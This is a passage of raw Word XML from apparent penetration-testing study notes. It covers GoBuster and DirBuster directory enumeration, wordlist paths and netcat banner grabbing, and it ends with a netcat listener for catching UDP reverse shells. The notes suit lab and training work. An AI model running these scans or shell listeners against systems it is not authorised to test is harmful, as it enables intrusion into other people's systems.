    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude responses containing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific text</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., wildcard error messages)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-text="404 Not Found"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011EA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1276"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclude responses with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specific content types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--exclude-content=application/json</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011ED">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove automatic extensions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (useful for wildcard filtering)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1283"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--remove-extensions</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F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F2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wwqdq3sq3vbf" w:id="147"/>
      <w:bookmarkEnd w:id="147"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DirBuster</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a GUI that also allows for recursion, then use dirbuster. You can open it via this command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dirbuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F7">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F8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011F9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ja7q5gchwzr7" w:id="148"/>
      <w:bookmarkEnd w:id="148"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GoBuster</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FC">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Guide on GoBuster (good for mainly directory enumeration):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000011FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster dir -u http://[IP] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001200">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-x php,html,txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to specify file types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001201">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-b 404</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to avoid common error messages to make output cleaner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001202">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o gobuster_results.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to save to file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001203">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can add "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" for recursive so that it digs deeper in subdirectories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001204">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001205">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding cookies (same as ffuf):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001207">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001208">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001209">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Some other words lists include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/dirbuster/directory-list-2.3-big.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="923"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000012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11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001212">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_czod8yv3ehtm" w:id="149"/>
      <w:bookmarkEnd w:id="149"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat (nc)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001213">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001214">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use netcat to connect to random TCP ports and try interacting with it or just see if there are any banners or errors that give you more info. And copy and paste any output into Google:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001215">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="193"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-nv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.76.101 6000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001216">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="193"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"n" is for no domain resolving (just use IP) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001217">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="193"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"v" is for verbose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001218">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001219">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to catch UDP reverse shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnup 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
